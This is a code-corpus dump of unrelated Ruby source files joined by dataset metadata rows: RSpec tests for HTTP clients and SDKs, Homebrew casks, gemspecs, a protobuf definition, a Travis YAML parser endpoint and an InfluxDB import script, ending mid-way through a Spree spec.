it "has an on_complete handler that is called when the request is completed" do
request = Typhoeus::Request.new("http://localhost:3000")
foo = nil
request.on_complete do |response|
foo = response
end
request.response = :bar
request.call_handlers
foo.should == :bar
end
it "has an on_complete setter" do
foo = nil
proc = Proc.new {|response| foo = response}
request = Typhoeus::Request.new("http://localhost:3000")
request.on_complete = proc
request.response = :bar
request.call_handlers
foo.should == :bar
end
it "stores the handled response that is the return value from the on_complete block" do
request = Typhoeus::Request.new("http://localhost:3000")
request.on_complete do |response|
"handled"
end
request.response = :bar
request.call_handlers
request.handled_response.should == "handled"
end
it "has an after_complete handler that recieves what on_complete returns" do
request = Typhoeus::Request.new("http://localhost:3000")
request.on_complete do |response|
"handled"
end
good = nil
request.after_complete do |object|
good = object == "handled"
end
request.call_handlers
good.should be_true
end
it "has an after_complete setter" do
request = Typhoeus::Request.new("http://localhost:3000")
request.on_complete do |response|
"handled"
end
good = nil
proc = Proc.new {|object| good = object == "handled"}
request.after_complete = proc
request.call_handlers
good.should be_true
end
describe "time info" do
it "should have time" do
response = Typhoeus::Request.get("http://localhost:3000")
response.time.should > 0
end
it "should have connect time" do
response = Typhoeus::Request.get("http://localhost:3000")
response.connect_time.should > 0
end
it "should have app connect time" do
response = Typhoeus::Request.get("http://localhost:3000")
response.app_connect_time.should > 0
end
it "should have start transfer time" do
response = Typhoeus::Request.get("http://localhost:3000")
response.start_transfer_time.should > 0
end
it "should have pre-transfer time" do
response = Typhoeus::Request.get("http://localhost:3000")
response.pretransfer_time.should > 0
end
end
describe 'cache_key_basis' do
it 'should allow overriding the cache key basis' do
req1 = Typhoeus::Request.new('http://localhost:3000')
req2 = Typhoeus::Request.new('http://localhost:3000')
req2.cache_key_basis = 'localhost'
req1.cache_key.should_not == req2.cache_key
end
end
describe "authentication" do
it "should allow to set username and password" do
auth = { :username => 'foo', :password => 'bar' }
e = Typhoeus::Request.get(
"http://localhost:3001/auth_basic/#{auth[:username]}/#{auth[:password]}",
auth
)
e.code.should == 200
end
it "should allow to set authentication method" do
auth = {
:username => 'username',
:password => 'password',
:auth_method => :ntlm
}
e = Typhoeus::Request.get(
"http://localhost:3001/auth_ntlm",
auth
)
e.code.should == 200
end
end
end
describe "retry" do
it "should take a retry option"
it "should count the number of times a request has failed"
end
end
| 30.857494 | 129 | 0.601242 |
18e256f71cc111a6bb0bdea2420ba80a597b0476 | 3,755 | require 'spec_helper'
require 'integration_setup'
require 'ingenico/connect/sdk/factory'
require 'ingenico/connect/sdk/communicator_configuration'
require 'ingenico/connect/sdk/proxy_configuration'
require 'ingenico/connect/sdk/communication_exception'
require 'ingenico/connect/sdk/merchant/services/convert_amount_params'
require 'ingenico/connect/sdk/merchant/services/services_client'
require 'webrick'
require 'webrick/httpproxy'
describe 'proxies' do
context 'using proxy server' do
proxy_server = nil
password_filename = 'password_file'
before :context do
WebMock.allow_net_connect!
# set up a proxy
proxy_server = Thread.new do
config = { Realm: 'testing' }
htpasswd = WEBrick::HTTPAuth::Htpasswd.new(password_filename) # create new Apache password file
proxy_configuration = Integration.init_communicator_configuration(Integration::PROPERTIES_URI_PROXY).proxy_configuration
htpasswd.set_passwd config[:Realm], proxy_configuration.username, proxy_configuration.password
config[:UserDB] = htpasswd
basic_auth = WEBrick::HTTPAuth::ProxyBasicAuth.new(config)
auth_handler = Proc.new do |req, res|
basic_auth.authenticate(req, res)
end
proxy = WEBrick::HTTPProxyServer.new(Port: 9999, ProxyVia: false,
ProxyAuthProc: auth_handler)
Signal.trap('INT') do
proxy.shutdown
end
proxy.start
end
sleep 1 # wait for the proxy server
end
after :context do
Thread.kill(proxy_server)
File.delete(password_filename)
WebMock.disable_net_connect!
end
# NOTE: if this test is running for a long time with no response
# check https://eu.sandbox.api-ingenico.com because this is where merchant
# connects to.
it 'can be connected to' do
request = Ingenico::Connect::SDK::Merchant::Services::ConvertAmountParams.new
request.amount = 123
request.source = 'USD'
request.target = 'EUR'
Integration.init_client(true) do |client|
services = client.merchant(Integration::MERCHANT_ID).services
services.convert_amount(request)
expect(services).to be_an_instance_of(Ingenico::Connect::SDK::Merchant::Services::ServicesClient)
end
end
# test that connecting to a nonexistent proxy will raise an error
it 'should be connected to if possible' do
yaml = YAML.load_file(Integration::PROPERTIES_URI_PROXY)
config = Ingenico::Connect::SDK::CommunicatorConfiguration.new(properties: yaml, connect_timeout: 0.5, socket_timeout: 0.5,
authorization_type: 'v1HMAC',
api_key_id: Integration::API_KEY_ID,
secret_api_key: Integration::SECRET_API_KEY,
proxy_configuration: Ingenico::Connect::SDK::ProxyConfiguration.new(host: 'localhost',
port: 65535,
username: 'arg',
password: 'blarg'))
begin
client = Ingenico::Connect::SDK::Factory.create_client_from_configuration(config)
expect{client.merchant(Integration::MERCHANT_ID).services.testconnection}.to raise_error(Ingenico::Connect::SDK::CommunicationException)
ensure
client.close unless client.nil?
end
end
end # end of using proxy server
end
| 41.263736 | 144 | 0.619973 |
798fbd6b90cd92b94a8557a0235606d581b91f75 | 457 | cask 'cuttle' do
version '1.1'
sha256 '7133beb24c3a37fe13f12d0b8110f1fcaf541d80e938cfaafb37a4d47bfcca15'
url "https://github.com/oakmac/cuttle/releases/download/v#{version}/cuttle-v#{version}-mac.dmg"
appcast 'https://github.com/Swordfish90/cool-retro-term/releases.atom',
checkpoint: 'eb9ed3cb84563876d607d15d5d262e750d5d9210b6ee8ea1621ea0e261b0c646'
name 'CUTTLE'
homepage 'https://github.com/oakmac/cuttle'
app 'Cuttle.app'
end
| 35.153846 | 97 | 0.774617 |
5d8ef1f0ec53f0b9963bafcb92bda1393a5b325d | 773 | module Coconductor
module ProjectFiles
class CodeOfConductFile < Coconductor::ProjectFiles::ProjectFile
include Licensee::ContentHelper
EXTENSIONS = %w[md markdown txt].freeze
EXT_REGEX = /\.#{Regexp.union(EXTENSIONS)}/i.freeze
BASENAME_REGEX = /(citizen[_-])?code[_-]of[_-]conduct/i.freeze
# LANG_REGEX must contain extension to avoid matching .md as the lang
LANG_REGEX = /(\.(?<lang>[a-z]{2}(-[a-z]{2})?)#{EXT_REGEX})?/i.freeze
FILENAME_REGEX = /#{BASENAME_REGEX}#{LANG_REGEX}#{EXT_REGEX}?/i.freeze
def self.name_score(filename)
filename =~ /\A#{FILENAME_REGEX}/ ? 1.0 : 0.0
end
def possible_matchers
[Matchers::Exact, Matchers::Dice, Matchers::FieldAware]
end
end
end
end
| 33.608696 | 76 | 0.654592 |
385a3e7fc515b91864805d02e00c1266e2d86779 | 7,282 | # -*- encoding: utf-8 -*-
# stub: github-pages 204 ruby lib
Gem::Specification.new do |s|
s.name = "github-pages".freeze
s.version = "204"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["GitHub, Inc.".freeze]
s.date = "2020-01-24"
s.description = "Bootstrap the GitHub Pages Jekyll environment locally.".freeze
s.email = "[email protected]".freeze
s.executables = ["github-pages".freeze]
s.files = ["bin/github-pages".freeze]
s.homepage = "https://github.com/github/pages-gem".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.3.0".freeze)
s.rubygems_version = "3.1.2".freeze
s.summary = "Track GitHub Pages dependencies.".freeze
s.installed_by_version = "3.1.2" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<jekyll>.freeze, ["= 3.8.5"])
s.add_runtime_dependency(%q<jekyll-sass-converter>.freeze, ["= 1.5.2"])
s.add_runtime_dependency(%q<kramdown>.freeze, ["= 1.17.0"])
s.add_runtime_dependency(%q<jekyll-commonmark-ghpages>.freeze, ["= 0.1.6"])
s.add_runtime_dependency(%q<liquid>.freeze, ["= 4.0.3"])
s.add_runtime_dependency(%q<rouge>.freeze, ["= 3.13.0"])
s.add_runtime_dependency(%q<github-pages-health-check>.freeze, ["= 1.16.1"])
s.add_runtime_dependency(%q<jekyll-redirect-from>.freeze, ["= 0.15.0"])
s.add_runtime_dependency(%q<jekyll-sitemap>.freeze, ["= 1.4.0"])
s.add_runtime_dependency(%q<jekyll-feed>.freeze, ["= 0.13.0"])
s.add_runtime_dependency(%q<jekyll-gist>.freeze, ["= 1.5.0"])
s.add_runtime_dependency(%q<jekyll-paginate>.freeze, ["= 1.1.0"])
s.add_runtime_dependency(%q<jekyll-coffeescript>.freeze, ["= 1.1.1"])
s.add_runtime_dependency(%q<jekyll-seo-tag>.freeze, ["= 2.6.1"])
s.add_runtime_dependency(%q<jekyll-github-metadata>.freeze, ["= 2.13.0"])
s.add_runtime_dependency(%q<jekyll-avatar>.freeze, ["= 0.7.0"])
s.add_runtime_dependency(%q<jekyll-remote-theme>.freeze, ["= 0.4.1"])
s.add_runtime_dependency(%q<jemoji>.freeze, ["= 0.11.1"])
s.add_runtime_dependency(%q<jekyll-mentions>.freeze, ["= 1.5.1"])
s.add_runtime_dependency(%q<jekyll-relative-links>.freeze, ["= 0.6.1"])
s.add_runtime_dependency(%q<jekyll-optional-front-matter>.freeze, ["= 0.3.2"])
s.add_runtime_dependency(%q<jekyll-readme-index>.freeze, ["= 0.3.0"])
s.add_runtime_dependency(%q<jekyll-default-layout>.freeze, ["= 0.1.4"])
s.add_runtime_dependency(%q<jekyll-titles-from-headings>.freeze, ["= 0.5.3"])
s.add_runtime_dependency(%q<jekyll-swiss>.freeze, ["= 1.0.0"])
s.add_runtime_dependency(%q<minima>.freeze, ["= 2.5.1"])
s.add_runtime_dependency(%q<jekyll-theme-primer>.freeze, ["= 0.5.4"])
s.add_runtime_dependency(%q<jekyll-theme-architect>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-cayman>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-dinky>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-hacker>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-leap-day>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-merlot>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-midnight>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-minimal>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-modernist>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-slate>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-tactile>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-time-machine>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<mercenary>.freeze, ["~> 0.3"])
s.add_runtime_dependency(%q<nokogiri>.freeze, [">= 1.10.4", "< 2.0"])
s.add_runtime_dependency(%q<terminal-table>.freeze, ["~> 1.4"])
s.add_development_dependency(%q<jekyll_test_plugin_malicious>.freeze, ["~> 0.2"])
s.add_development_dependency(%q<pry>.freeze, ["~> 0.10"])
s.add_development_dependency(%q<rspec>.freeze, ["~> 3.3"])
s.add_development_dependency(%q<rubocop-github>.freeze, ["= 0.14.0"])
else
s.add_dependency(%q<jekyll>.freeze, ["= 3.8.5"])
s.add_dependency(%q<jekyll-sass-converter>.freeze, ["= 1.5.2"])
s.add_dependency(%q<kramdown>.freeze, ["= 1.17.0"])
s.add_dependency(%q<jekyll-commonmark-ghpages>.freeze, ["= 0.1.6"])
s.add_dependency(%q<liquid>.freeze, ["= 4.0.3"])
s.add_dependency(%q<rouge>.freeze, ["= 3.13.0"])
s.add_dependency(%q<github-pages-health-check>.freeze, ["= 1.16.1"])
s.add_dependency(%q<jekyll-redirect-from>.freeze, ["= 0.15.0"])
s.add_dependency(%q<jekyll-sitemap>.freeze, ["= 1.4.0"])
s.add_dependency(%q<jekyll-feed>.freeze, ["= 0.13.0"])
s.add_dependency(%q<jekyll-gist>.freeze, ["= 1.5.0"])
s.add_dependency(%q<jekyll-paginate>.freeze, ["= 1.1.0"])
s.add_dependency(%q<jekyll-coffeescript>.freeze, ["= 1.1.1"])
s.add_dependency(%q<jekyll-seo-tag>.freeze, ["= 2.6.1"])
s.add_dependency(%q<jekyll-github-metadata>.freeze, ["= 2.13.0"])
s.add_dependency(%q<jekyll-avatar>.freeze, ["= 0.7.0"])
s.add_dependency(%q<jekyll-remote-theme>.freeze, ["= 0.4.1"])
s.add_dependency(%q<jemoji>.freeze, ["= 0.11.1"])
s.add_dependency(%q<jekyll-mentions>.freeze, ["= 1.5.1"])
s.add_dependency(%q<jekyll-relative-links>.freeze, ["= 0.6.1"])
s.add_dependency(%q<jekyll-optional-front-matter>.freeze, ["= 0.3.2"])
s.add_dependency(%q<jekyll-readme-index>.freeze, ["= 0.3.0"])
s.add_dependency(%q<jekyll-default-layout>.freeze, ["= 0.1.4"])
s.add_dependency(%q<jekyll-titles-from-headings>.freeze, ["= 0.5.3"])
s.add_dependency(%q<jekyll-swiss>.freeze, ["= 1.0.0"])
s.add_dependency(%q<minima>.freeze, ["= 2.5.1"])
s.add_dependency(%q<jekyll-theme-primer>.freeze, ["= 0.5.4"])
s.add_dependency(%q<jekyll-theme-architect>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-cayman>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-dinky>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-hacker>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-leap-day>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-merlot>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-midnight>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-minimal>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-modernist>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-slate>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-tactile>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-time-machine>.freeze, ["= 0.1.1"])
s.add_dependency(%q<mercenary>.freeze, ["~> 0.3"])
s.add_dependency(%q<nokogiri>.freeze, [">= 1.10.4", "< 2.0"])
s.add_dependency(%q<terminal-table>.freeze, ["~> 1.4"])
s.add_dependency(%q<jekyll_test_plugin_malicious>.freeze, ["~> 0.2"])
s.add_dependency(%q<pry>.freeze, ["~> 0.10"])
s.add_dependency(%q<rspec>.freeze, ["~> 3.3"])
s.add_dependency(%q<rubocop-github>.freeze, ["= 0.14.0"])
end
end
| 58.725806 | 112 | 0.660258 |
01461f1a295fcf9298dc7efdafda643b5aef3dd4 | 1,116 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v3/errors/size_limit_error.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v3/errors/size_limit_error.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v3.errors.SizeLimitErrorEnum" do
end
add_enum "google.ads.googleads.v3.errors.SizeLimitErrorEnum.SizeLimitError" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :REQUEST_SIZE_LIMIT_EXCEEDED, 2
value :RESPONSE_SIZE_LIMIT_EXCEEDED, 3
end
end
end
module Google
module Ads
module GoogleAds
module V3
module Errors
SizeLimitErrorEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.errors.SizeLimitErrorEnum").msgclass
SizeLimitErrorEnum::SizeLimitError = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.errors.SizeLimitErrorEnum.SizeLimitError").enummodule
end
end
end
end
end
| 34.875 | 182 | 0.750896 |
b993de26981e232293ae6866db4ef203ecd69443 | 1,456 | # frozen_string_literal: true
require 'oj'
require 'travis/yml/web/helpers'
module Travis
module Yml
module Web
class Parse < Sinatra::Base
include Helpers
MIME_TYPE = 'application/vnd.travis-ci.configs+json'
post '/parse' do
handle
end
post '/v1/parse' do
handle
end
private
def handle
status 200
json Parse::Config.new(load).to_h
rescue Yml::InputError => e
status 400
error(e)
end
def load
Travis::Yml.load(configs? ? configs : [config], opts)
end
def configs?
env['CONTENT_TYPE'] == MIME_TYPE
end
def config
Parts::Part.new(request_body)
end
def configs
Oj.load(request_body).map do |part|
config, source, mode = part.values_at(*%w(config source merge_mode))
key = source == 'api' ? :rgt : :lft
Parts::Part.new(config, source, key => mode)
end
end
def opts
keys = OPTS.keys.map(&:to_s) & params.keys
symbolize(keys.map { |key| [key, params[key.to_s] == 'true'] }.to_h)
end
def symbolize(hash)
hash.map { |key, value| [key.to_sym, value] }.to_h
end
end
end
end
end
require 'travis/yml/web/parse/config'
| 22.060606 | 82 | 0.506868 |
bba889b5a1d816ad0a209a079b3317a7893e3214 | 4,161 | require 'nokogiri'
require 'open-uri'
require 'influxdb'
username = ENV['wltp_adminuser']
password = ENV['wltp_adminpass']
jenkins_user = ENV['wltp_adminuser']
jenkins_pass = ENV['wltp_adminpass']
database = 'test'
singlestats = 'd'
fullstats = 'z'
time_precision = 'ns'
influxdb = InfluxDB::Client.new database,
username: username,
password: password
#@doc = Nokogiri::XML(open('http://localhost:8080/job/Test/api/xml', :http_basic_authentication => [jenkins_user,jenkins_pass]))
# Create the target database unless it already exists. The manual
# index-based for-loop is replaced with Enumerable#any?; behavior is
# identical and `dbcreated` keeps its truthy/falsy meaning for any
# later use in this script.
dbs = influxdb.list_databases
dbcreated = dbs.any? { |db| db["name"] == database }
influxdb.create_database(database) unless dbcreated
for i in 137..155
if i.between?(141,148)
next
end
stats = Hash.new
timestamp = 0
cat = ""
totaltime = 0
totalfailures = 0
totaltests = 0
for j in 1..29
#puts i.to_s + " - " + j.to_s
if j == 17
next
end
@doc = Nokogiri::XML(File.read("../1/#{j}_#{i}.xml"))
#puts "time: " + @doc.xpath("//testsuite/@time").text
testtime = @doc.xpath("//testsuite/@time").text
totaltime = totaltime + testtime.to_f()
#puts "name: " + @doc.xpath("//testsuite/@name").text
testname = @doc.xpath("//testsuite/@name").text
#puts "categories: " + @doc.xpath("//property[@name = 'categories']/@value").text
categories = @doc.xpath( "//property[@name = 'categories']/@value").text["PostInstallation"]
if categories == nil
[email protected]( "//property[@name = 'categories']/@value").text["FunctionalTest"]
end
if categories == nil
[email protected]( "//property[@name = 'categories']/@value").text["PreInstallation"]
end
if categories == nil
[email protected]( "//property[@name = 'categories']/@value").text["RestCategory"]
if categories != nil
categories = "FunctionalTest"
end
end
if cat != categories
cat = categories
totaltests = 0
totaltime = 0
totalfailures = 0
end
#puts categories
#puts "timestamp: " + @doc.xpath("//property[@name = 'timestamp']/@value").text
if timestamp == 0
timestamp = Integer(@doc.xpath("//property[@name = 'timestamp']/@value").text)
timestamp = timestamp * 1000000
end
if timestamp != 0
timestamp = timestamp + 1
end
#puts timestamp
tests = @doc.xpath("//testsuite/@tests").text
totaltests = totaltests + Integer(tests)
#puts "errors: " + @doc.xpath("//testsuite/@errors").text
errors = @doc.xpath("//testsuite/@errors").text
#puts "failures: " + @doc.xpath("//testsuite/@failures").text
failures = @doc.xpath("//testsuite/@failures").text
totalfailures = totalfailures + Integer(failures)
stats[categories] = {"totaltime" => 0, "totalfailures" => 0, "totaltests" => 0}
stats[categories]["totaltime"]=totaltime
stats[categories]["totalfailures"]=totalfailures
stats[categories]["totaltests"] = totaltests
data = {
values: {
value: i,
tests: tests,
testtime: testtime.to_f,
testname: testname,
errors: errors,
failures: failures,
},
tags: {
run: i,
category: categories
},
timestamp: Integer(timestamp)
}
#puts data
influxdb.write_point(singlestats,data,time_precision)
end
poststats = {
values: {
total: stats["PostInstallation"]["totaltests"],
failures: stats["PostInstallation"]["totalfailures"],
testtime: stats["PostInstallation"]["totaltime"]
},
tags: {
run: i,
category: "PostInstallation"
},
timestamp: timestamp
}
functionalstats = {
values: {
total: stats["FunctionalTest"]["totaltests"],
failures: stats["FunctionalTest"]["totalfailures"],
testtime: stats["FunctionalTest"]["totaltime"]
},
tags: {
run: i,
category: "FunctionalTest"
},
timestamp: timestamp
}
influxdb.write_point(fullstats,poststats,time_precision)
influxdb.write_point(fullstats,functionalstats,time_precision)
end
| 26.335443 | 128 | 0.622927 |
87bb10ff428b0c5b79e745f52e876609a57b6327 | 1,317 | cask 'imazing-mini' do
  version '2'
  sha256 :no_check # required as upstream package is updated in-place

  # dl.devmate.com was verified as official when first introduced to the cask
  url "https://dl.devmate.com/com.DigiDNA.iMazing#{version}Mac.Mini/iMazingMini#{version}forMac.dmg"
  name 'iMazing Mini'
  homepage 'https://imazing.com/mini'

  # The full iMazing app bundles the same functionality.
  conflicts_with cask: 'imazing'
  depends_on macos: '>= 10.8'

  app 'iMazing Mini.app'

  # Quit the running app and remove its login item before uninstalling.
  uninstall login_item: 'iMazing Mini',
            quit: "com.DigiDNA.iMazing#{version}Mac.Mini"

  zap trash: [
               '~/Library/Application Support/iMazing',
               '~/Library/Application Support/iMazing Mini',
               '~/Library/Application Support/MobileSync/Backup/iMazing.Versions',
               "~/Library/Caches/com.DigiDNA.iMazing#{version}Mac.Mini",
               "~/Library/Caches/com.plausiblelabs.crashreporter.data/com.DigiDNA.iMazing#{version}Mac.Mini",
               '~/Library/Caches/iMazing',
               "~/Library/Preferences/com.DigiDNA.iMazing#{version}Mac.Mini.plist",
               '/Users/Shared/iMazing Mini',
             ]

  caveats <<~EOS
    Performing a zap on this cask removes files pertaining to both #{token}
    and imazing, so it should not be done if you only want to uninstall one of them.
  EOS
end
| 38.735294 | 109 | 0.660592 |
6224c5dbac06b41bf675bf77d3d7978a3f77f85e | 857 | # -*- encoding: utf-8 -*-
$:.push File.expand_path("../lib", __FILE__)

require "automux/version"
require "automux/installation"

# Gem specification for automux, a configurable tmux session automator.
Gem::Specification.new do |spec|
  spec.name    = "automux"
  spec.version = Automux::Version::STRING
  spec.authors = ["Alex Johnson"]
  spec.email   = ["github.com/notalex"]

  spec.description = "Highly configurable Tmux Automator"
  spec.summary     = "Automate tmux sessions stored in yaml files using custom recipes"
  spec.homepage    = "https://github.com/notalex/automux"
  spec.license     = "MIT License"

  # Package everything tracked by git; executables come from bin/.
  spec.files         = `git ls-files`.split($/)
  spec.executables   = spec.files.grep(%r{^bin/}).map { |f| File.basename(f) }
  spec.test_files    = spec.files.grep(%r{^(test|spec|features)/})
  spec.require_paths = ["lib"]

  spec.post_install_message = Automux::Installation::MESSAGE
end
| 38.954545 | 89 | 0.648775 |
614a8ee1fccc6095b2f3ee591f487ee481c45de9 | 3,505 | require 'spec_helper'
# Specs for the archive::parse_artifactory_url Puppet function: it must
# decompose an Artifactory artifact URL into its repository layout parts.
describe 'archive::parse_artifactory_url' do
  it { is_expected.not_to eq(nil) }
  it { is_expected.to run.with_params.and_raise_error(ArgumentError) }
  it { is_expected.to run.with_params('not_a_url').and_raise_error(ArgumentError) }

  # Release artifacts carry no integration (SNAPSHOT) revision.
  context 'releases' do
    it do
      is_expected.to run.with_params('https://repo.jfrog.org/artifactory/repo1-cache/maven-proxy/maven-proxy-webapp/0.2/maven-proxy-webapp-0.2.war').and_return(
        'base_url' => 'https://repo.jfrog.org/artifactory',
        'repository' => 'repo1-cache',
        'org_path' => 'maven-proxy',
        'module' => 'maven-proxy-webapp',
        'base_rev' => '0.2',
        'folder_iteg_rev' => nil,
        'file_iteg_rev' => nil,
        'classifier' => nil,
        'ext' => 'war'
      )
    end

    context 'with classifier' do
      it do
        is_expected.to run.with_params('https://repo.jfrog.org/artifactory/repo1-cache/maven-proxy/maven-proxy-standalone/0.2/maven-proxy-standalone-0.2-app.jar').and_return(
          'base_url' => 'https://repo.jfrog.org/artifactory',
          'repository' => 'repo1-cache',
          'org_path' => 'maven-proxy',
          'module' => 'maven-proxy-standalone',
          'base_rev' => '0.2',
          'folder_iteg_rev' => nil,
          'file_iteg_rev' => nil,
          'classifier' => 'app',
          'ext' => 'jar'
        )
      end
    end
  end

  # SNAPSHOT artifacts populate the folder/file integration revisions.
  context 'SNAPSHOTs' do
    it do
      is_expected.to run.with_params('https://repo.jfrog.org/artifactory/java.net-cache/com/sun/grizzly/grizzly-framework/2.0.0-SNAPSHOT/grizzly-framework-2.0.0-SNAPSHOT.jar').and_return(
        'base_url' => 'https://repo.jfrog.org/artifactory',
        'repository' => 'java.net-cache',
        'org_path' => 'com/sun/grizzly',
        'module' => 'grizzly-framework',
        'base_rev' => '2.0.0',
        'folder_iteg_rev' => 'SNAPSHOT',
        'file_iteg_rev' => 'SNAPSHOT',
        'classifier' => nil,
        'ext' => 'jar'
      )
    end

    context 'with classifiers' do
      it do
        is_expected.to run.with_params('https://repo.jfrog.org/artifactory/java.net-cache/com/sun/grizzly/grizzly-framework/2.0.0-SNAPSHOT/grizzly-framework-2.0.0-SNAPSHOT-javadoc.jar').and_return(
          'base_url' => 'https://repo.jfrog.org/artifactory',
          'repository' => 'java.net-cache',
          'org_path' => 'com/sun/grizzly',
          'module' => 'grizzly-framework',
          'base_rev' => '2.0.0',
          'folder_iteg_rev' => 'SNAPSHOT',
          'file_iteg_rev' => 'SNAPSHOT',
          'classifier' => 'javadoc',
          'ext' => 'jar'
        )
      end

      it do
        is_expected.to run.with_params('https://repo.jfrog.org/artifactory/java.net-cache/com/sun/grizzly/grizzly-framework/2.0.0-SNAPSHOT/grizzly-framework-2.0.0-SNAPSHOT-tests.jar').and_return(
          'base_url' => 'https://repo.jfrog.org/artifactory',
          'repository' => 'java.net-cache',
          'org_path' => 'com/sun/grizzly',
          'module' => 'grizzly-framework',
          'base_rev' => '2.0.0',
          'folder_iteg_rev' => 'SNAPSHOT',
          'file_iteg_rev' => 'SNAPSHOT',
          'classifier' => 'tests',
          'ext' => 'jar'
        )
      end
    end
  end
end
| 42.743902 | 197 | 0.542083 |
915edd88922fae89a3aef71114164878fadb78e4 | 1,506 | class Chatbot::Card
include ActiveModel::Model
include Speechable
attr_accessor :components
validates :components, presence: true, length: {
maximum: 6, too_long: I18n.t('errors.chat_statement.card.too_long')
}
validate :recursive_validation
def nature
"card"
end
def components_as_statements
components.collect do |component|
component_as_statement(component)
end
end
private
def recursive_validation
components
.each do |component|
unless ['text', 'image', 'video', 'button', 'button_group', 'map', 'geolocation'].include? component['nature']
errors.add(:base, I18n.t('errors.chat_statement.invalid_nature', nature: component['nature']))
end
end
.map { |component| component_as_statement(component) }
.reject(&:nil?)
.find_all(&:invalid?)
.each { |statement| errors.add(:base, statement.errors.full_messages.join(', ')) }
end
def component_as_statement(component)
case component['nature']
when 'text'
Chatbot::Text.new(component['content'])
when 'image'
Chatbot::Image.new(component['content'])
when 'video'
Chatbot::Video.new(component['content'])
when 'button'
Chatbot::Button.new(component['content'])
when 'button_group'
Chatbot::ButtonGroup.new(component['content'])
when 'map'
Chatbot::Map.new(component['content'])
when 'geolocation'
Chatbot::Geolocation.new(component['content'])
end
end
end
| 26.421053 | 118 | 0.666667 |
9199429ef23419d0794557185730ca6ec52e4c50 | 1,908 | require 'spec_helper'
require 'chefspec/cacher'
describe ChefSpec::Cacher do
  # Anonymous example group extended with the cacher so `cached` can be
  # exercised outside of a real spec file; metadata pins the cache key
  # prefix to 'spec'.
  let(:klass) do
    Class.new(RSpec::Core::ExampleGroup) do
      extend ChefSpec::Cacher
      def self.metadata
        { parent_example_group: { location: 'spec' } }
      end
    end
  end
  let(:cache) { described_class.class_variable_get(:@@cache) }
  let(:preserve_cache) { false }
  # Start each example with an empty cache unless the example opts out.
  before(:each) { described_class.class_variable_set(:@@cache, {}) unless preserve_cache }

  describe 'cached' do
    it 'lazily defines the results for the cache' do
      klass.cached(:chef_run)
      expect(klass).to be_method_defined(:chef_run)
    end

    it 'adds the item to the cache when called' do
      runner = double(:runner)
      klass.cached(:chef_run) { runner }
      klass.new.chef_run
      # Cache is keyed per-thread, then by "<location>.<name>".
      expect(cache[Thread.current.object_id]).to have_key('spec.chef_run')
      expect(cache[Thread.current.object_id]['spec.chef_run']).to eq(runner)
    end

    context 'when multithreaded environment' do
      it 'is thread safe' do
        (1..2).each do |n|
          Thread.new do
            klass.cached(:chef_run) { n }
            expect(klass.new.chef_run).to eq(n)
          end.join
        end
      end
    end

    context 'when example groups are defined by looping' do
      # Keep the cache across examples so each looped context must get
      # its own entry rather than reusing the first one.
      let(:preserve_cache) { true }

      ['first', 'second', 'third'].each do |iteration|
        context "on the #{iteration} iteration" do
          context 'in caching context' do
            cached(:cached_iteration) { iteration }
            it 'caches the iteration for this context' do
              expect(cached_iteration).to eq iteration
            end
          end
        end
      end
    end
  end

  describe 'cached!' do
    # cached! should define the cached accessor and eagerly load it in a
    # before hook.
    it 'loads the value at runtime' do
      expect(klass).to receive(:cached).with(:chef_run).once
      expect(klass).to receive(:before).once
      klass.cached!(:chef_run) { }
    end
  end
end
| 26.873239 | 90 | 0.623166 |
ab8d6a77dfe66f9ff6bcfa70a23839c471fb0364 | 2,547 | require 'spec_helper'
describe Spree::Admin::ImageSettingsController do
stub_authorization!
context "updating image settings" do
it "should be able to update paperclip settings" do
spree_put :update, { :preferences => {
"attachment_path" => "foo/bar",
"attachment_default_url" => "baz/bar"
}
}
Spree::Config[:attachment_path].should == "foo/bar"
Spree::Config[:attachment_default_url].should == "baz/bar"
end
context "paperclip styles" do
it "should be able to update the paperclip styles" do
spree_put :update, { "attachment_styles" => { "thumb" => "25x25>" } }
updated_styles = ActiveSupport::JSON.decode(Spree::Config[:attachment_styles])
updated_styles["thumb"].should == "25x25>"
end
it "should be able to add a new style" do
spree_put :update, { "attachment_styles" => { }, "new_attachment_styles" => { "1" => { "name" => "jumbo", "value" => "2000x2000>" } } }
